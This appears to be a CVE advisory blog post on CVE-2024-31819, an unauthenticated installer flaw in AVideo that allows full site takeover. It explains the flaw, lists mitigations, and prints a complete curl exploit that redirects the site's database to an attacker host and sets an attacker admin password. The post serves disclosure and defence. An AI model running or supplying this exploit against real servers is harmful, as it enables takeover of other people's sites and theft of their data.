AVideo, Improper Access Control, CVE-2024-31819 (Critical)

Listen to this Post

The vulnerability CVE-2024-31819 exists in the `install/checkConfiguration.php` endpoint of AVideo (formerly YouPHPTube) versions 12.4 through 14.2 . This endpoint is designed to perform the initial application setup, including database configuration, admin account creation, and writing the `videos/configuration.php` file. The core issue is a complete lack of authentication or access control on this endpoint . The only check performed is whether the `videos/configuration.php` file already exists; if it does not, the script assumes the application is not yet installed and executes the setup process using POST parameters supplied by the user . An unauthenticated remote attacker can exploit this by sending a crafted POST request to the endpoint. The attacker provides their own malicious database host, credentials, and admin password . The script then connects to the attacker-controlled database, creates the site schema, inserts an admin user with the attacker’s password, and writes a new configuration file pointing the application to the attacker’s database. This gives the attacker full administrative control over the target AVideo instance. The impact is critical because it allows for complete application takeover, data exfiltration to the attacker’s database, and potential remote code execution through admin-level plugin management, all without any prior authentication .

dailycve form:

Platform: AVideo
Version: 12.4 to 14.2
Vulnerability : Unauthenticated Installer Access
Severity: Critical (CVSS 9.3)
date: April 10, 2024

Prediction: Patched in v14.3

What Undercode Say:

Analytics:

This vulnerability has a CVSS score of 9.3, indicating a critical severity level . The EPSS (Exploit Prediction Scoring System) score is very high at 83.99%, meaning there is a significant probability of exploitation in the wild . The exploit is classified as a web attack and is trivial to execute, requiring no authentication and low complexity .

Exploit:

The exploit is performed by sending a POST request to the vulnerable endpoint with attacker-controlled parameters.

Example curl command to exploit CVE-2024-31819
curl -X POST http://target-site.com/install/checkConfiguration.php \
-d "systemRootPath=/var/www/html/AVideo/" \
-d "databaseHost=ATTACKER_IP" \
-d "databasePort=3306" \
-d "databaseUser=attacker_user" \
-d "databasePass=attacker_pass" \
-d "databaseName=avideo" \
-d "createTables=1" \
-d "[email protected]" \
-d "systemAdminPass=AttackerPass123" \
-d "webSite=Pwned" \
-d "mainLanguage=en" \
-d "webSiteRootURL=http://target-site.com/"

After successful execution, the attacker can log in with username `admin` and the password `AttackerPass123` to gain full administrative access.

Protection from this CVE:

The primary protection is to upgrade to AVideo version 14.3 or later, where this issue is patched . If upgrading is not immediately possible, administrators should implement the following mitigations:
1. Restrict Access: Block external access to the `/install/` directory via web server configuration (e.g., `.htaccess` or Nginx rules) .
2. File Check: Ensure the `videos/configuration.php` file exists and is properly configured. If the site is already installed, the presence of this file should block the installer, but this is not a reliable defense on its own .
3. Implement Token: As a code fix, introduce a one-time setup token that must be provided to complete the installation .

Impact:

Successful exploitation allows a remote, unauthenticated attacker to completely take over the AVideo application . The attacker becomes the sole administrator, can control all application data (which may be exfiltrated to their own database), and can leverage admin privileges to upload malicious plugins or files, leading to remote code execution on the underlying web server .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top